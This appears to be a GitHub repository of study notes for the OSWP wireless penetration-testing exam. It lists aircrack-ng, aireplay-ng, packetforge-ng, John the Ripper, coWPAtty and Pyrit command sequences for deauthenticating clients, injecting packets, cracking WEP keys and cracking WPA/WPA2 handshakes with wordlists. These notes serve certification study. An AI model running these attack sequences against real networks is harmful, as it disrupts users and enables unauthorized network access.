├── 0 - Exam Roadmap & Attack Map ├── 1 - Aircrack-ng Essentials ├── 2 - WEP Cracking Attacks ├── 3 - WPA & WPA2 Cracking Attacks └── README.md /0 - Exam Roadmap & Attack Map: -------------------------------------------------------------------------------- 1 | ## Exam Roadmap 2 | 3 | ssh @ -p ## connecting to the target system with SSH information provided by @offsec 4 | iw dev wlan0 scan | grep SSID ## wireless networks within the range of the wireless card (wlan0) are detected 5 | airmon-ng start wlan0 ## setting the wireless card (wlan0) to monitor mode 6 | airodump-ng mon0 ## detecting surrounding networks by listening to the network in monitor mode 7 | iwconfig mon0 channel 3 ## change the channel where the wireless network card is located 8 | iwlist mon0 channel ## view the channel where the wireless network card is located 9 | airodump-ng -c 3 --bssid -w mon0 ## listening to the target AP on the specified channel 10 | 11 | 12 | 13 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 14 | 15 | 16 | 17 | ## Opening more than one screen with the "screen" tool; 18 | 19 | # screen -S test ## creating a workspace 20 | # scren -l ## list actively used screens 21 | # screen -a -r 13245 ## switch to a specifically selected screen 22 | # CTRL + a + n ## connects to the next session 23 | # CTRL + a + p ## go back to the previous session 24 | 25 | 26 | 27 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 28 | 29 | 30 | 31 | ### Attack Map ### 32 | 33 | 34 | WEP? or WPA/WPA2? 35 | 36 | > WEP; 37 | 38 | AUTH: OPN? or SKA? 39 | 40 | > AUTH: OPN; 41 | 42 | Any client connected to AP? YES? or NO? 43 | 44 | > YES; 45 | 46 | # ARP Request Replay Attack 47 | # Interactive Packet Replay Attack 48 | # Deauthentication Attack (can be used in both cases (yes or no)) 49 | 50 | > NO; 51 | 52 | # Fake Authentication Attack (can be used in both cases (yes or no)) 53 | # Fragmentation Attack 54 | # Korek ChopChop Attack 55 | 56 | 57 | > AUTH: SKA (Bypassing WEP Shared Key Authentication); 58 | 59 | ## There is a client connected to the AP. You can follow the steps below to attack; 60 | 61 | # Deauthentication Attack 62 | # Fake Shared Key Authentication Attack 63 | # ARP Request Replay Attack 64 | # Deauthentication Attack 65 | # Aircrack-ng 66 | 67 | 68 | > WPA/WPA2 69 | 70 | ## Attack; 71 | 72 | # Deauthentication Attack 73 | 74 | ## Cracking the network key; 75 | 76 | # with Aircrack-ng 77 | # with JTR and Aircrack-ng 78 | # with coWPAtty 79 | # with Pyrit 80 | 81 | 82 | 83 | -------------------------------------------------------------------------------- /1 - Aircrack-ng Essentials: -------------------------------------------------------------------------------- 1 | # Notes 2 | 3 | > wlan0 ## network interface where the wireless network card 4 | > mon0 ## network interface where the wireless network card is in monitor mode 5 | 6 | 7 | 8 | # airmon-ng check ## control monitor processes 9 | # airmon-ng check kill ## kill monitor processes 10 | # airmon-ng start wlan0 ## open the monitor mode 11 | # iwconfig mon0 channel 3 ## change the channel where the wireless network card is located 12 | # iwlist mon0 channel ## view the channel where the wireless network card is located 13 | # airmon-ng stop mon0 ## close the monitor mode 14 | # iw dev wlan0 scan | grep SSID ## wireless networks within the range of the wireless card (wlan0) are detected 15 | 16 | 17 | 18 | # airodump-ng mon0 ## a basic listening session 19 | # airodump-ng -c 3 --bssid -w cap1 mon0 ## listening to a specific AP's network 20 | # airodump-ng -c 3 --bssid -w cap1 --ivs mon0 ## reducing disk network used by file capture while listening to the network 21 | 22 | 23 | 24 | # aireplay-ng ##general usage 25 | 26 | 27 | Attack Attack Name 28 | ------ ----------- 29 | # 0 ## Deauthentication 30 | # 1 ## Fake Authentication 31 | # 2 ## Interactive Packet Replay 32 | # 3 ## ARP Request Replay Attack 33 | # 4 ## KoreK ChopChop Attack 34 | # 5 ## Fragmentation Attack 35 | # 6 ## Café-Latte Attack 36 | # 7 ## Client-Oriented Fragmentation Attack 37 | # 9 ## Injection Test 38 | 39 | 40 | 41 | # aireplay-ng -9 mon0 ## basic injection test 42 | # aireplay-ng -9 -e -a mon0 ## injection test for hidden or specific SSID 43 | # aireplay-ng -9 -i mon0 ## card-to-card (attack) injection test 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /2 - WEP Cracking Attacks: -------------------------------------------------------------------------------- 1 | 2 | ## Fake Authentication Attack 3 | 4 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 5 | macchanger --show ## learning the MAC address of the mon0 (monitor mode) network interface 6 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 7 | aireplay-ng -1 0 -e -a -h ## performing a fake authentication attack against AP 8 | 9 | 10 | ## Deauthentication Attack 11 | 12 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 13 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 14 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP 15 | 16 | 17 | ## ARP Request Replay Attack 18 | 19 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 20 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 21 | aireplay-ng -1 0 -e -a -h ## performing a fake authentication attack against AP 22 | aireplay-ng -3 -b -h ## performing a ARP Request Replay attack against AP 23 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP 24 | aircrack-ng ## cracking WEP key (In order to achieve a successful result, you need to catch a sufficient number of IVs during the attack.) 25 | 26 | 27 | ## Interactive Packet Replay Attack 28 | 29 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 30 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 31 | aireplay-ng -1 0 -e -a -h ## performing a fake authentication attack against AP 32 | aireplay-ng -2 -b -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 ## performing a interactive packet replay attack against AP 33 | aircrack-ng -z ## cracking WEP key (In order to achieve a successful result, you need to catch a sufficient number of IVs during the attack.) 34 | 35 | 36 | ## Fragmentation Attack 37 | 38 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 39 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 40 | aireplay-ng -1 0 -e -a -h ## performing a fake authentication attack against AP 41 | aireplay-ng -5 -b -h ## performing a fragmentation attack against AP 42 | packetforge-ng -0 -a -h -l -k -y -w ## creating an ARP request packet using packetforge-ng 43 | tcpdump -n -vvv -e -s0 -r ## check the contents of the created package 44 | aireplay-ng -2 -r ## injecting the generated packet into the network (If the correct pack is injected, the IV amount will increase rapidly.) 45 | aircrack-ng ## cracking WEP key (In order to achieve a successful result, you need to catch a sufficient number of IVs during the attack.) 46 | 47 | 48 | ## Korek ChopChop Attack 49 | 50 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 51 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 52 | aireplay-ng -1 0 -e -a -h ## performing a fake authentication attack against AP 53 | aireplay-ng -4 -b -h ## performing a korek chopchop attack against AP 54 | packetforge-ng -0 -a -h -l -k -y -w ## creating an ARP request packet using packetforge-ng 55 | tcpdump -n -vvv -e -s0 -r ## check the contents of the created package 56 | aireplay-ng -2 -r ## injecting the generated packet into the network (If the correct pack is injected, the IV amount will increase rapidly.) 57 | aircrack-ng ## cracking WEP key (In order to achieve a successful result, you need to catch a sufficient number of IVs during the attack.) 58 | 59 | 60 | ## Bypassing WEP Shared Key Authentication 61 | 62 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 63 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 64 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP to capture the PRGA XOR keystream 65 | aireplay-ng -1 0 -e -y -a -h ## performing a fake shared key authentication using XOR key flow 66 | aireplay-ng -3 -b -h ## performing a ARP Request Replay attack against AP 67 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP 68 | aircrack-ng ## cracking WEP key (In order to achieve a successful result, you need to catch a sufficient number of IVs during the attack.) 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /3 - WPA & WPA2 Cracking Attacks: -------------------------------------------------------------------------------- 1 | 2 | ## Cracking with Aircrack-ng 3 | 4 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 5 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 6 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP to capture the handshake packet 7 | aircrack-ng -w ## cracking WPA password with aircrack-ng 8 | 9 | 10 | ## Cracking with JTR and Aircrack-ng 11 | 12 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 13 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 14 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP to capture the handshake packet 15 | ./john --wordlist= --rules --stdout | aircrack-ng -e -w - ## cracking WPA password with JTR and aircrack-ng 16 | 17 | 18 | ## Cracking with coWPAtty 19 | 20 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 21 | airodump-ng -c --bssid -w ## listening to the target AP on the specified channel 22 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP to capture the handshake packet 23 | cowpatty -r -f -2 -s ## cracking WPA password with coWPAtty in dictionary mode 24 | or 25 | genpmk -f -d -s ## generating hashes to crack WPA password in coWPAtty with rainbow table mode 26 | cowpatty -r -d -2 -s ## cracking WPA password with coWPAtty using generated hashes 27 | 28 | 29 | ## Cracking with Pyrit 30 | 31 | airmon-ng start ## setting the wireless card (wlan0) to monitor mode 32 | pyrit -r -o stripLive ## using pyrit to sniff in monitor mode interface by saving the capture process to a file 33 | aireplay-ng -0 1 -a -c ## performing a deauthentication attack against AP to capture the handshake packet 34 | pyrit -r -i -b attack_passthrough ## cracking WPA password with pyrit in dictionary mode 35 | or 36 | pyrit -i import_passwords ## import word list to crack WPA password in pyrit with database mode 37 | pyrit -e create_essid ## adding the ESSID of the access point to the pyrit database 38 | pyrit batch ## creating PMKs for ESSID 39 | pyrit -r -b attack_db ## cracking WPA password in database mode with pyrit 40 | 41 | 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSWP 2 | 3 | ![OSWP](https://blog.own.sh/img/oscp-osce-oswp-review/offsec-student-certified-emblem-rgb-oswp.png) 4 | 5 | This repo contains the resources I used during the OSWP exam. It is prepared "only" for the exam syllabus. I prepared it in an explanatory way, I hope you find it useful. Good luck guys!🥂😈 6 | --------------------------------------------------------------------------------